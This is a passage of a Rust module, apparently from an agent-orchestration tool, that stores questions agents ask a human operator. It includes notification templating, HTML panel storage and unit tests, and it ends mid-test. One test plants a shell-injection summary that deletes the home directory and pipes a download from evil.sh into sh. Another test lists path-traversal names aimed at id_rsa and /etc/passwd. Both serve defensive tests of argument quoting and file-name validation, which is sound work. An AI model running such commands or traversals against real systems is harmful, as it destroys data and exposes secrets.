1771 NOTIFY_TIMEOUT.as_secs()
1772 ),
1773 };
1774 if !out.status.success() {
1775 let stderr = String::from_utf8_lossy(&out.stderr);
1776 let why = stderr
1777 .lines()
1778 .rev()
1779 .find(|l| !l.trim().is_empty())
1780 .unwrap_or("no output on stderr")
1781 .trim();
1782 bail!(
1783 "notification command `{program}` exited with {}: {why}",
1784 out.status
1785 );
1786 }
1787 Ok(())
1788}
1789
1790fn expand(template: &str, run: &str, summary: &str, url: &str) -> String {
1796 let table = [("{summary}", summary), ("{run}", run), ("{url}", url)];
1797 let mut out = String::with_capacity(template.len());
1798 let mut rest = template;
1799 while let Some(at) = rest.find('{') {
1800 out.push_str(&rest[..at]);
1801 let tail = &rest[at..];
1802 match table.iter().find(|(token, _)| tail.starts_with(token)) {
1803 Some((token, value)) => {
1804 out.push_str(value);
1805 rest = &tail[token.len()..];
1806 }
1807 None => {
1808 out.push('{');
1810 rest = &tail[1..];
1811 }
1812 }
1813 }
1814 out.push_str(rest);
1815 out
1816}
1817
1818fn web_url() -> String {
1820 question_url(&std::env::var(WEB_URL_ENV).unwrap_or_default())
1821}
1822
1823fn question_url(base: &str) -> String {
1830 let base = base.trim().trim_end_matches('/');
1831 if base.is_empty() || base.contains('#') {
1832 return base.to_owned();
1833 }
1834 format!("{base}/#/questions")
1835}
1836
1837fn fill_panel(dir: &Path, html: &str, assets: &[(String, &Path)]) -> Result<()> {
1842 let index = dir.join(PANEL_HTML);
1843 std::fs::write(&index, html).with_context(|| format!("write {}", index.display()))?;
1844 for (name, src) in assets {
1845 let dst = dir.join(name);
1846 std::fs::copy(src, &dst)
1847 .with_context(|| format!("copy {} to {}", src.display(), dst.display()))?;
1848 }
1849 Ok(())
1850}
1851
1852fn clear_dir(path: &Path) -> Result<()> {
1857 match std::fs::remove_dir_all(path) {
1858 Ok(()) => Ok(()),
1859 Err(e) if e.kind() == std::io::ErrorKind::NotFound => Ok(()),
1860 Err(e) => Err(e).with_context(|| format!("remove {}", path.display())),
1861 }
1862}
1863
1864fn read_path(path: &Path) -> Result<Question> {
1865 let body = std::fs::read_to_string(path).with_context(|| format!("read {}", path.display()))?;
1866 let q: Question =
1867 serde_json::from_str(&body).with_context(|| format!("parse {}", path.display()))?;
1868 if q.schema > SCHEMA {
1869 bail!(
1874 "question {} was written by a newer magi (schema {}, this build \
1875 only speaks up to {SCHEMA})",
1876 q.id,
1877 q.schema
1878 );
1879 }
1880 Ok(q)
1881}
1882
1883pub fn short_id(id: &str) -> &str {
1885 short(id)
1886}
1887
1888fn short(id: &str) -> &str {
1889 id.split('-').next_back().unwrap_or(id)
1890}
1891
1892fn new_id() -> String {
1893 let stamp = jiff::Zoned::now().strftime("%Y%m%d-%H%M%S");
1894 let seed = crate::rng::entropy();
1895 format!("{stamp}-{:04x}", (seed ^ (seed >> 32)) & 0xffff)
1896}
1897
1898#[cfg(test)]
1899mod tests {
1900 use super::*;
1901
1902 fn store() -> (tempfile::TempDir, Questions) {
1905 let dir = tempfile::tempdir().unwrap();
1906 let s = Questions::at(dir.path().join("questions"));
1907 (dir, s)
1908 }
1909
1910 #[test]
1911 fn run_names_task_only_for_task_questions() {
1912 for (node, want) in [
1913 (crate::conduct::NODE, true),
1914 (crate::triage::NODE, true),
1915 (crate::triage::DEPS_NODE, true),
1916 (crate::land::APPROVAL_NODE, false),
1917 (crate::bump::NOTICE_NODE, false),
1918 ("implement", false),
1919 ] {
1920 let mut q = choice_question();
1921 q.node = node.to_owned();
1922 assert_eq!(q.run_names_task(), want, "{node}");
1923 }
1924 }
1925
1926 #[test]
1927 fn deleting_a_run_stops_its_questions_asking() {
1928 let (_dir, store) = store();
1929
1930 let mut open_one = choice_question();
1931 store.put(&mut open_one).unwrap();
1932 let mut answered = free_question();
1933 answered
1934 .answer(Answer::Text("keep this".to_owned()))
1935 .unwrap();
1936 store.put(&mut answered).unwrap();
1937 let mut elsewhere = choice_question();
1938 elsewhere.run = "20260903-105039-3cbf".to_owned();
1939 store.put(&mut elsewhere).unwrap();
1940
1941 let n = store
1942 .abandon_for_run(&open_one.run, "run was deleted")
1943 .unwrap();
1944 assert_eq!(n, 1, "only the open question of that run");
1945
1946 let back = store.get(&open_one.id).unwrap();
1947 assert!(!back.status.open(), "it no longer asks for a decision");
1948 assert!(
1949 back.detail.contains("run was deleted"),
1950 "the operator can see why: {}",
1951 back.detail
1952 );
1953
1954 let kept = store.get(&answered.id).unwrap();
1955 assert_eq!(
1956 kept.status,
1957 QuestionStatus::Answered,
1958 "an answered question is a decision on record, not something to revoke"
1959 );
1960 assert!(
1961 store.get(&elsewhere.id).unwrap().status.open(),
1962 "another run's question is untouched"
1963 );
1964 assert!(store.open_for(&open_one.run).is_empty());
1965 }
1966
1967 #[test]
1968 fn settle_run_abandons_only_for_a_status_that_is_not_resumable() {
1969 let (_dir, store) = store();
1970 let mut q = choice_question();
1971 store.put(&mut q).unwrap();
1972
1973 let n = store.settle_run(&q.run, RunStatus::Blocked).unwrap();
1975 assert_eq!(n, 0);
1976 assert!(store.get(&q.id).unwrap().status.open());
1977
1978 let n = store.settle_run(&q.run, RunStatus::Failed).unwrap();
1981 assert_eq!(n, 1);
1982 let back = store.get(&q.id).unwrap();
1983 assert!(!back.status.open());
1984 assert!(back.detail.contains(&q.run) && back.detail.contains("failed"));
1985
1986 assert_eq!(store.settle_run(&q.run, RunStatus::Failed).unwrap(), 0);
1988 }
1989
1990 fn choice_question() -> Question {
1991 Question::new(
1992 "20260902-201256-9fb7".to_owned(),
1993 "implement".to_owned(),
1994 "impl-A".to_owned(),
1995 "Which storage backend should the cache use?".to_owned(),
1996 "Both are already dependencies.".to_owned(),
1997 vec!["SQLite".to_owned(), "Redis".to_owned()],
1998 )
1999 }
2000
2001 fn free_question() -> Question {
2002 Question::new(
2003 "20260902-201256-9fb7".to_owned(),
2004 "review".to_owned(),
2005 "rev-1".to_owned(),
2006 "What should the error message say?".to_owned(),
2007 String::new(),
2008 Vec::new(),
2009 )
2010 }
2011
2012 fn quiet() -> config::Notify {
2014 config::Notify::default()
2015 }
2016
2017 #[test]
2018 fn the_stored_json_is_the_shape_the_web_ui_was_written_against() {
2019 let mut q = choice_question();
2023 q.id = "20260902-231501-ab12".to_owned();
2024 let open: serde_json::Value = serde_json::to_value(&q).unwrap();
2025 let keys: Vec<&str> = open
2029 .as_object()
2030 .unwrap()
2031 .keys()
2032 .map(String::as_str)
2033 .collect();
2034 assert_eq!(
2035 keys,
2036 [
2037 "actions",
2038 "answer",
2039 "answer_delivered",
2040 "answer_timeout",
2041 "answered_at",
2042 "asked_at",
2043 "assets",
2044 "choices",
2045 "cwd",
2046 "delivered_turns",
2047 "deputy",
2048 "detail",
2049 "id",
2050 "node",
2051 "panel",
2052 "run",
2053 "schema",
2054 "seat",
2055 "status",
2056 "summary",
2057 "thread",
2058 "waiter",
2059 ],
2060 "the on-disk field set is a contract with the front end"
2061 );
2062 assert_eq!(open["schema"], 5);
2063 assert_eq!(open["thread"], serde_json::json!([]));
2064 assert_eq!(open["id"], "20260902-231501-ab12");
2065 assert_eq!(open["run"], "20260902-201256-9fb7");
2066 assert_eq!(open["node"], "implement");
2067 assert_eq!(open["seat"], "impl-A");
2068 assert_eq!(open["status"], "open");
2069 assert_eq!(open["choices"], serde_json::json!(["SQLite", "Redis"]));
2070 assert_eq!(open["answered_at"], serde_json::Value::Null);
2071 assert_eq!(open["answer"], serde_json::Value::Null);
2072 let asked = open["asked_at"].as_str().unwrap();
2073 assert!(
2074 asked.ends_with('Z') && asked.contains('T'),
2075 "timestamps are UTC RFC 3339, which is what `new Date()` parses: {asked}"
2076 );
2077
2078 q.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2080 let answered = serde_json::to_value(&q).unwrap();
2081 assert_eq!(answered["status"], "answered");
2082 assert_eq!(answered["answer"], serde_json::json!({"choice": "SQLite"}));
2083 assert!(answered["answered_at"].is_string());
2084
2085 let mut free = free_question();
2087 free.answer(Answer::Text("Say which file it was".to_owned()))
2088 .unwrap();
2089 assert_eq!(
2090 serde_json::to_value(&free).unwrap()["answer"],
2091 serde_json::json!({"text": "Say which file it was"})
2092 );
2093
2094 let body = serde_json::to_string(&q).unwrap();
2096 assert_eq!(serde_json::from_str::<Question>(&body).unwrap(), q);
2097 }
2098
2099 #[test]
2100 fn an_answer_the_question_never_offered_is_refused_with_its_own_reason() {
2101 let mut unoffered = choice_question();
2104 let a = unoffered
2105 .answer(Answer::Choice("Postgres".to_owned()))
2106 .unwrap_err()
2107 .to_string();
2108
2109 let mut typed = choice_question();
2110 let b = typed
2111 .answer(Answer::Text("use Postgres".to_owned()))
2112 .unwrap_err()
2113 .to_string();
2114
2115 let mut blank = free_question();
2116 let c = blank
2117 .answer(Answer::Text(" \n".to_owned()))
2118 .unwrap_err()
2119 .to_string();
2120
2121 let mut twice = choice_question();
2122 twice.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2123 let d = twice
2124 .answer(Answer::Choice("Redis".to_owned()))
2125 .unwrap_err()
2126 .to_string();
2127
2128 assert!(a.contains("not one of the choices"), "{a}");
2129 assert!(b.contains("multiple choice"), "{b}");
2130 assert!(c.contains("empty"), "{c}");
2131 assert!(d.contains("already answered"), "{d}");
2132 let mut distinct = vec![a, b, c, d];
2133 let asked = distinct.len();
2134 distinct.sort_unstable();
2135 distinct.dedup();
2136 assert_eq!(distinct.len(), asked, "each rejection is distinguishable");
2137
2138 assert_eq!(unoffered.status, QuestionStatus::Open);
2140 assert_eq!(typed.status, QuestionStatus::Open);
2141 assert_eq!(blank.status, QuestionStatus::Open);
2142 assert_eq!(twice.resolution().as_deref(), Some("SQLite"));
2144
2145 let mut free = free_question();
2147 let e = free
2148 .answer(Answer::Choice("SQLite".to_owned()))
2149 .unwrap_err()
2150 .to_string();
2151 assert!(e.contains("free text"), "{e}");
2152 }
2153
2154 #[test]
2155 fn open_questions_are_listed_before_answered_ones() {
2156 let (_dir, s) = store();
2157 let mut old_open = choice_question();
2160 old_open.id = "20260101-000001-aaaa".to_owned();
2161 let mut new_open = choice_question();
2162 new_open.id = "20260101-000002-bbbb".to_owned();
2163 let mut answered = choice_question();
2164 answered.id = "20260101-000003-cccc".to_owned();
2165 answered.answer(Answer::Choice("Redis".to_owned())).unwrap();
2166 for q in [&mut old_open, &mut new_open, &mut answered] {
2167 s.put(q).unwrap();
2168 }
2169
2170 let ids: Vec<String> = s.list().into_iter().map(|q| q.id).collect();
2171 assert_eq!(
2172 ids,
2173 [
2174 "20260101-000002-bbbb",
2175 "20260101-000001-aaaa",
2176 "20260101-000003-cccc"
2177 ],
2178 "what has stopped work comes first; history sorts underneath"
2179 );
2180 assert_eq!(s.count_open(), 2);
2181 assert_eq!(s.open_for("20260902-201256-9fb7").len(), 2);
2182 assert!(s.open_for("some-other-run").is_empty());
2183 assert_eq!(s.resolve_id("bbbb").unwrap(), "20260101-000002-bbbb");
2185 assert!(s.get("20260101-000002-bbbb").is_ok());
2186 assert!(s.resolve_id("nope").is_err());
2187 assert!(
2188 s.revision() > 0,
2189 "the store's mtime drives the phone's polling"
2190 );
2191 }
2192
2193 #[test]
2194 fn a_question_file_magi_cannot_read_does_not_take_the_listing_down() {
2195 let (_dir, s) = store();
2196 let mut good = choice_question();
2197 s.put(&mut good).unwrap();
2198 std::fs::write(s.path_of("20260101-000009-dead"), "{\"schema\": 1, \"id\"").unwrap();
2200 let future = serde_json::json!({
2201 "schema": 99, "id": "20260101-000010-beef", "run": "r", "node": "n",
2202 "seat": "s", "summary": "?", "detail": "", "choices": [],
2203 "status": "open", "asked_at": "2026-01-01T00:00:00Z",
2204 "answered_at": null, "answer": null,
2205 });
2206 std::fs::write(
2207 s.path_of("20260101-000010-beef"),
2208 serde_json::to_string(&future).unwrap(),
2209 )
2210 .unwrap();
2211
2212 let listed = s.list();
2213 assert_eq!(listed.len(), 1, "one bad file must not hide the open one");
2214 assert_eq!(listed[0].id, good.id);
2215 let e = s.get("20260101-000010-beef").unwrap_err().to_string();
2217 assert!(e.contains("schema"), "{e}");
2218 }
2219
2220 #[tokio::test]
2221 async fn the_wait_returns_the_answer_another_process_wrote() {
2222 let (dir, s) = store();
2227 let mut q = choice_question();
2228 let id = q.id.clone();
2229 let writer = Questions::at(dir.path().join("questions"));
2230 let handle = tokio::spawn(async move {
2231 tokio::time::sleep(Duration::from_millis(30)).await;
2232 let mut fresh = writer.get(&id).expect("the question was filed first");
2233 fresh.answer(Answer::Choice("SQLite".to_owned())).unwrap();
2234 writer.put(&mut fresh).unwrap();
2235 });
2236
2237 let got = wait_for_owner(
2238 &mut q,
2239 &s,
2240 &quiet(),
2241 Duration::from_secs(5),
2242 Duration::from_millis(10),
2243 )
2244 .await
2245 .unwrap();
2246
2247 handle.await.unwrap();
2248 assert_eq!(got, Wait::Answered("SQLite".to_owned()));
2249 assert_eq!(
2250 q.status,
2251 QuestionStatus::Answered,
2252 "the caller's copy is refreshed from the answering process's record"
2253 );
2254 assert!(q.answered_at.is_some());
2255 }
2256
2257 #[tokio::test]
2258 async fn a_question_nobody_answers_is_abandoned_not_deleted() {
2259 let (_dir, s) = store();
2260 let mut q = choice_question();
2261
2262 let got = wait_for_owner(
2263 &mut q,
2264 &s,
2265 &quiet(),
2266 Duration::from_millis(60),
2267 Duration::from_millis(10),
2268 )
2269 .await
2270 .unwrap();
2271
2272 assert_eq!(
2273 got,
2274 Wait::Abandoned,
2275 "a slow human is not an error; the run parks"
2276 );
2277 assert_eq!(q.status, QuestionStatus::Abandoned);
2278 let on_disk = s.get(&q.id).expect("the record of what was asked survives");
2279 assert_eq!(on_disk.status, QuestionStatus::Abandoned);
2280 assert!(
2281 on_disk.detail.contains("Abandoned:"),
2282 "why nobody answered belongs with the question: {}",
2283 on_disk.detail
2284 );
2285 assert!(on_disk.resolution().is_none());
2286 assert_eq!(s.count_open(), 0);
2287 }
2288
2289 #[tokio::test]
2290 async fn a_slice_running_out_leaves_the_question_open_rather_than_abandoning_it() {
2291 let (_dir, s) = store();
2296 let mut q = choice_question();
2297 s.put(&mut q).unwrap();
2298
2299 let got = wait_loop(
2300 &mut q,
2301 &s,
2302 Duration::from_secs(3600),
2303 Duration::from_millis(30),
2304 Duration::from_millis(10),
2305 )
2306 .await
2307 .unwrap();
2308
2309 assert_eq!(
2310 got,
2311 Wait::Pending,
2312 "the clock on this call ran out, not the owner's patience"
2313 );
2314 assert_eq!(
2315 q.status,
2316 QuestionStatus::Open,
2317 "a slice expiring must never abandon the question"
2318 );
2319 let on_disk = s.get(&q.id).expect("still on disk, still open");
2320 assert_eq!(
2321 on_disk.status,
2322 QuestionStatus::Open,
2323 "nothing about the record changed just because this call gave up"
2324 );
2325 }
2326
2327 #[tokio::test]
2328 async fn a_wait_resumed_after_a_slice_sees_the_answer_the_first_slice_missed() {
2329 let (dir, s) = store();
2334 let mut q = choice_question();
2335 s.put(&mut q).unwrap();
2336
2337 let first = wait_loop(
2338 &mut q,
2339 &s,
2340 Duration::from_secs(3600),
2341 Duration::from_millis(30),
2342 Duration::from_millis(10),
2343 )
2344 .await
2345 .unwrap();
2346 assert_eq!(first, Wait::Pending);
2347
2348 let id = q.id.clone();
2349 let writer = Questions::at(dir.path().join("questions"));
2350 let mut fresh = writer.get(&id).unwrap();
2351 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2352 writer.put(&mut fresh).unwrap();
2353
2354 let second = resume_wait(&mut q, &s, Duration::from_millis(500))
2359 .await
2360 .unwrap();
2361 assert_eq!(second, Wait::Answered("Redis".to_owned()));
2362 assert_eq!(q.status, QuestionStatus::Answered);
2363 }
2364
2365 #[tokio::test]
2366 async fn a_reply_left_in_the_gap_before_a_resumed_wait_starts_is_never_missed() {
2367 let (dir, s) = store();
2377 let mut q = choice_question();
2378 s.put(&mut q).unwrap();
2379
2380 let first = wait_loop(
2381 &mut q,
2382 &s,
2383 Duration::from_secs(3600),
2384 Duration::from_millis(30),
2385 Duration::from_millis(10),
2386 )
2387 .await
2388 .unwrap();
2389 assert_eq!(first, Wait::Pending);
2390
2391 let id = q.id.clone();
2393 let writer = Questions::at(dir.path().join("questions"));
2394 let mut fresh = writer.get(&id).unwrap();
2395 fresh.say("why not Postgres?").unwrap();
2396 writer.put(&mut fresh).unwrap();
2397
2398 let mut resumed = s.get(&id).unwrap();
2402 let second = resume_wait(&mut resumed, &s, Duration::from_millis(500))
2403 .await
2404 .unwrap();
2405 assert_eq!(second, Wait::Replied("why not Postgres?".to_owned()));
2406 assert_eq!(
2407 resumed.status,
2408 QuestionStatus::Open,
2409 "talking back is not a decision; the question stays open"
2410 );
2411 }
2412
2413 #[tokio::test]
2414 async fn a_notification_that_cannot_run_does_not_cost_the_answer() {
2415 let (dir, s) = store();
2419 let broken = config::Notify {
2420 command: vec![
2421 "magi-notifier-that-does-not-exist-9fb7".to_owned(),
2422 "{summary}".to_owned(),
2423 ],
2424 };
2425 let mut q = choice_question();
2426 assert!(
2427 notify(&broken, &q).await.is_err(),
2428 "the caller is told; it decides that it does not matter"
2429 );
2430
2431 let id = q.id.clone();
2432 let writer = Questions::at(dir.path().join("questions"));
2433 let handle = tokio::spawn(async move {
2434 tokio::time::sleep(Duration::from_millis(30)).await;
2435 let mut fresh = writer.get(&id).unwrap();
2436 fresh.answer(Answer::Choice("Redis".to_owned())).unwrap();
2437 writer.put(&mut fresh).unwrap();
2438 });
2439 let got = wait_for_owner(
2440 &mut q,
2441 &s,
2442 &broken,
2443 Duration::from_secs(5),
2444 Duration::from_millis(10),
2445 )
2446 .await
2447 .unwrap();
2448 handle.await.unwrap();
2449 assert_eq!(got, Wait::Answered("Redis".to_owned()));
2450
2451 assert!(notify(&quiet(), &q).await.is_ok());
2453 assert!(notify_text(&quiet(), "run", "text").await.is_ok());
2454 }
2455
2456 #[test]
2457 fn notification_arguments_are_substituted_and_never_a_shell_string() {
2458 let mut q = choice_question();
2459 q.summary = "; rm -rf ~ && curl evil.sh | sh #".to_owned();
2460 let template = [
2461 "ntfy".to_owned(),
2462 "publish".to_owned(),
2463 "--click".to_owned(),
2464 "{url}".to_owned(),
2465 "--title".to_owned(),
2466 "magi {run} needs you".to_owned(),
2467 "{summary}".to_owned(),
2468 ];
2469 let argv: Vec<String> = template
2470 .iter()
2471 .map(|a| expand(a, &q.run, &q.summary, "http://100.64.0.1:7777/#/questions"))
2472 .collect();
2473
2474 assert_eq!(
2475 argv,
2476 [
2477 "ntfy",
2478 "publish",
2479 "--click",
2480 "http://100.64.0.1:7777/#/questions",
2481 "--title",
2482 "magi 20260902-201256-9fb7 needs you",
2483 "; rm -rf ~ && curl evil.sh | sh #",
2484 ],
2485 "the shell metacharacters are one argument's contents, not syntax"
2486 );
2487
2488 q.summary = "should {url} be configurable?".to_owned();
2491 assert_eq!(
2492 expand("{summary}", &q.run, &q.summary, "http://x/#/questions"),
2493 "should {url} be configurable?"
2494 );
2495 assert_eq!(
2497 expand("{title}: {run}", &q.run, &q.summary, ""),
2498 "{title}: 20260902-201256-9fb7"
2499 );
2500 assert_eq!(
2501 expand("no placeholders", &q.run, &q.summary, "http://x"),
2502 "no placeholders"
2503 );
2504 }
2505
2506 #[test]
2507 fn the_notification_link_lands_on_the_view_that_can_answer() {
2508 assert_eq!(
2509 question_url("http://100.64.0.1:7777"),
2510 "http://100.64.0.1:7777/#/questions"
2511 );
2512 assert_eq!(
2513 question_url("http://100.64.0.1:7777/"),
2514 "http://100.64.0.1:7777/#/questions"
2515 );
2516 assert_eq!(
2518 question_url("http://magi.ts.net/#/runs"),
2519 "http://magi.ts.net/#/runs"
2520 );
2521 assert_eq!(question_url(" "), "");
2523 }
2524
2525 fn panelled() -> Question {
2527 let mut q = choice_question();
2528 q.id = "20260903-014455-ab12".to_owned();
2529 q
2530 }
2531
2532 #[test]
2533 fn a_panel_round_trips_verbatim_with_its_assets_listed_sorted() {
2534 let (dir, s) = store();
2535 let work = dir.path().join("worktree");
2536 std::fs::create_dir_all(&work).unwrap();
2537 std::fs::write(work.join("diff.svg"), "<svg/>").unwrap();
2538 std::fs::write(work.join("table.png"), b"\x89PNG").unwrap();
2539
2540 let mut q = panelled();
2541 let html = "<h1>Merge?</h1>\n<img src=\"asset/diff.svg\">\n";
2542 s.put_panel(
2543 &mut q,
2544 html,
2545 &[work.join("table.png"), work.join("diff.svg")],
2546 )
2547 .unwrap();
2548 s.put(&mut q).unwrap();
2549
2550 assert!(q.panel);
2551 assert_eq!(
2552 q.assets,
2553 ["diff.svg", "table.png"],
2554 "sorted, not in the order the agent happened to pass them"
2555 );
2556 assert_eq!(
2557 s.panel_html(&q.id).as_deref(),
2558 Some(html),
2559 "the html is stored byte for byte; the agent authored the markup"
2560 );
2561 assert_eq!(
2562 s.panel_asset(&q.id, "diff.svg").unwrap().as_deref(),
2563 Some(&b"<svg/>"[..])
2564 );
2565
2566 let body = std::fs::read_to_string(s.path_of(&q.id)).unwrap();
2568 let json: serde_json::Value = serde_json::from_str(&body).unwrap();
2569 assert_eq!(json["panel"], true);
2570 assert_eq!(json["assets"], serde_json::json!(["diff.svg", "table.png"]));
2571 let back = s.get(&q.id).unwrap();
2572 assert!(back.panel);
2573 assert_eq!(back.assets, q.assets);
2574
2575 std::fs::remove_dir_all(&work).unwrap();
2578 assert_eq!(
2579 s.panel_asset(&q.id, "table.png").unwrap().as_deref(),
2580 Some(&b"\x89PNG"[..]),
2581 "a referenced asset would be gone with the worktree"
2582 );
2583 }
2584
2585 #[test]
2586 fn a_traversal_asset_name_is_refused_before_the_filesystem_is_touched() {
2587 let (dir, s) = store();
2588 let mut q = panelled();
2589 s.put_panel(&mut q, "<p>ok</p>", &[]).unwrap();
2590 s.put(&mut q).unwrap();
2591
2592 let secret = "this must never reach the browser";
2595 std::fs::write(s.root().join("id_rsa"), secret).unwrap();
2596 assert_eq!(
2597 std::fs::read_to_string(s.panel_dir(&q.id).join("../id_rsa")).unwrap(),
2598 secret,
2599 "the traversal is real: the operating system resolves this path \
2600 happily, which is why the name has to be refused before the join"
2601 );
2602
2603 let long = "x".repeat(200);
2604 for name in [
2605 "..",
2606 "../id_rsa",
2607 "..\\id_rsa",
2608 "sub/../id_rsa",
2609 "/",
2610 "\\",
2611 "/etc/passwd",
2612 "C:\\Windows\\win.ini",
2613 "",
2614 ".hidden",
2615 ".",
2616 long.as_str(),
2617 ] {
2618 assert!(!valid_asset_name(name), "`{name}` must fail the pattern");
2619 let e = s.panel_asset(&q.id, name).unwrap_err().to_string();
2620 assert!(
2621 e.contains("not a panel file name"),
2622 "`{name}` must be refused as a name, not attempted: {e}"
2623 );
2624 assert!(!e.contains(secret), "`{name}` reached the filesystem: {e}");
2625 }
2626 assert!(s.panel_asset(&q.id, "index.html").unwrap().is_some());
2629
2630 let hidden = dir.path().join(".hidden");
2633 std::fs::write(&hidden, "x").unwrap();
2634 let e = s
2635 .put_panel(&mut q, "<p>replacement</p>", &[hidden])
2636 .unwrap_err()
2637 .to_string();
2638 assert!(e.contains(".hidden") && e.contains("A-Za-z0-9"), "{e}");
2639 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>ok</p>"));
2640 assert!(q.assets.is_empty());
2641 }
2642
2643 #[test]
2644 fn the_panel_size_cap_refuses_an_oversized_asset_set_and_writes_nothing() {
2645 let (dir, s) = store();
2646 let mut q = panelled();
2647 s.put(&mut q).unwrap();
2648
2649 let big = dir.path().join("recording.png");
2652 std::fs::File::create(&big)
2653 .unwrap()
2654 .set_len(PANEL_MAX_BYTES)
2655 .unwrap();
2656
2657 let html = "<p>see the recording</p>";
2658 let total = PANEL_MAX_BYTES + html.len() as u64;
2659 let e = s.put_panel(&mut q, html, &[big]).unwrap_err().to_string();
2660 assert!(
2661 e.contains(&PANEL_MAX_BYTES.to_string()),
2662 "the cap is named so the agent knows the limit: {e}"
2663 );
2664 assert!(
2665 e.contains(&total.to_string()),
2666 "the actual size is named so the agent knows by how much: {e}"
2667 );
2668
2669 assert!(!q.panel);
2670 assert!(q.assets.is_empty());
2671 let left: Vec<String> = std::fs::read_dir(s.root())
2672 .unwrap()
2673 .map(|e| e.unwrap().file_name().to_string_lossy().into_owned())
2674 .collect();
2675 assert_eq!(
2676 left,
2677 [format!("{}.json", q.id)],
2678 "a refused panel leaves neither a directory nor scratch: {left:?}"
2679 );
2680 }
2681
2682 #[test]
2683 fn two_assets_sharing_a_base_name_are_refused_rather_than_one_hiding_the_other() {
2684 let (dir, s) = store();
2685 let (before, after) = (dir.path().join("before"), dir.path().join("after"));
2686 std::fs::create_dir_all(&before).unwrap();
2687 std::fs::create_dir_all(&after).unwrap();
2688 std::fs::write(before.join("diff.png"), "before").unwrap();
2689 std::fs::write(after.join("diff.png"), "after").unwrap();
2690
2691 let mut q = panelled();
2692 let e = s
2693 .put_panel(
2694 &mut q,
2695 "<p>x</p>",
2696 &[before.join("diff.png"), after.join("diff.png")],
2697 )
2698 .unwrap_err()
2699 .to_string();
2700 assert!(e.contains("diff.png"), "{e}");
2701 assert!(
2702 e.contains("before") && e.contains("after"),
2703 "both sources are named, because the fix is to rename one: {e}"
2704 );
2705 assert!(!q.panel);
2706 assert!(!s.panel_dir(&q.id).exists());
2707 }
2708
2709 #[test]
2710 fn storing_a_panel_twice_replaces_it_rather_than_merging_two_attempts() {
2711 let (dir, s) = store();
2712 std::fs::write(dir.path().join("old.png"), "old").unwrap();
2713 std::fs::write(dir.path().join("new.png"), "new").unwrap();
2714
2715 let mut q = panelled();
2716 s.put_panel(&mut q, "<p>first</p>", &[dir.path().join("old.png")])
2717 .unwrap();
2718 s.put_panel(&mut q, "<p>second</p>", &[dir.path().join("new.png")])
2719 .unwrap();
2720
2721 assert_eq!(q.assets, ["new.png"]);
2722 assert_eq!(s.panel_html(&q.id).as_deref(), Some("<p>second</p>"));
2723 assert!(
2724 s.panel_asset(&q.id, "old.png").unwrap().is_none(),
2725 "an asset from the first attempt would show a mix of two answers"
2726 );
2727
2728 s.drop_panel(&q.id).unwrap();
2729 assert!(s.panel_html(&q.id).is_none());
2730 assert!(!s.panel_dir(&q.id).exists());
2731 s.drop_panel(&q.id)
2732 .expect("dropping a panel that is already gone is the desired state");
2733 }
2734
2735 #[test]
2736 fn a_question_with_no_panel_reports_none_rather_than_an_error() {
2737 let (_dir, s) = store();
2738 let mut q = panelled();
2739 s.put(&mut q).unwrap();
2740
2741 assert!(!q.panel);
2742 assert!(s.panel_html(&q.id).is_none());
2743 assert!(
2744 s.panel_asset(&q.id, "diff.svg").unwrap().is_none(),
2745 "a missing file is a 404 for the caller, not a failure of the store"
2746 );
2747 let json = serde_json::to_value(&q).unwrap();
2748 assert_eq!(json["panel"], false);
2749 assert_eq!(json["assets"], serde_json::json!([]));
2750
2751 let e = s.put_panel(&mut q, " \n", &[]).unwrap_err().to_string();
2754 assert!(e.contains("empty panel"), "{e}");
2755 assert!(!s.panel_dir(&q.id).exists());
2756 }
2757
2758 #[test]
2759 fn a_question_written_before_panels_existed_still_deserialises() {
2760 let (_dir, s) = store();
2761 std::fs::create_dir_all(s.root()).unwrap();
2762 let id = "20260902-231501-ab12";
2763 let body = r#"{
2765 "schema": 1,
2766 "id": "20260902-231501-ab12",
2767 "run": "20260902-201256-9fb7",
2768 "node": "implement",
2769 "seat": "impl-A",
2770 "summary": "Which storage backend should the cache use?",
2771 "detail": "Both are already dependencies.",
2772 "choices": ["SQLite", "Redis"],
2773 "status": "open",
2774 "asked_at": "2026-09-02T23:15:01Z",
2775 "answered_at": null,
2776 "answer": null
2777}"#;
2778 std::fs::write(s.path_of(id), body).unwrap();
2779
2780 let q = s.get(id).unwrap();
2781 assert!(
2782 !q.panel,
2783 "an absent field means no panel, not a parse error"
2784 );
2785 assert!(q.assets.is_empty());
2786 assert_eq!(q.schema, 1);
2791 assert!(q.thread.is_empty());
2792 assert_eq!(
2793 q.answer_timeout, 0,
2794 "an absent field means unrecorded, not a zero-second deadline"
2795 );
2796 assert!(!q.waiting_on_agent());
2797 assert_eq!(q.summary, "Which storage backend should the cache use?");
2798 assert_eq!(
2799 s.list().len(),
2800 1,
2801 "and it is still listed; skipping it would hide an open question"
2802 );
2803 }
2804
2805 fn turn(who: Who, body: &str, at: Timestamp) -> Turn {
2806 Turn {
2807 who,
2808 body: body.to_owned(),
2809 at,
2810 }
2811 }
2812
2813 #[test]
2814 fn a_turn_round_trips_as_who_body_at_with_two_named_speakers() {
2815 let mut q = choice_question();
2818 q.thread
2819 .push(turn(Who::Operator, "why not Postgres?", Timestamp::now()));
2820 let value = serde_json::to_value(&q.thread[0]).unwrap();
2821 let mut keys: Vec<&str> = value
2822 .as_object()
2823 .unwrap()
2824 .keys()
2825 .map(String::as_str)
2826 .collect();
2827 keys.sort_unstable();
2828 assert_eq!(keys, ["at", "body", "who"]);
2829 assert_eq!(value["who"], "operator");
2830 assert_eq!(value["body"], "why not Postgres?");
2831
2832 let agent_turn = serde_json::json!({"who": "agent", "body": "hi", "at": value["at"]});
2833 let parsed: Turn = serde_json::from_value(agent_turn).unwrap();
2834 assert_eq!(parsed.who, Who::Agent);
2835 }
2836
2837 fn approval_question() -> Question {
2838 let mut q = Question::new(
2839 "run".into(),
2840 crate::land::APPROVAL_NODE.into(),
2841 "land".into(),
2842 "Merge?".into(),
2843 String::new(),
2844 vec!["merge".into(), "hold".into()],
2845 );
2846 let mut dep = Deputy::new("brief".into());
2847 dep.seat = Some(crate::agent::SeatState::new("deputy-x", "alpha", 1));
2848 q.deputy = Some(dep);
2849 q
2850 }
2851
2852 #[test]
2853 fn a_merge_approval_settles_on_a_verbatim_quote_of_the_latest_message() {
2854 let mut q = approval_question();
2855 q.say("merge").unwrap();
2856 q.reply("sure?", vec!["merge".into(), "hold".into()])
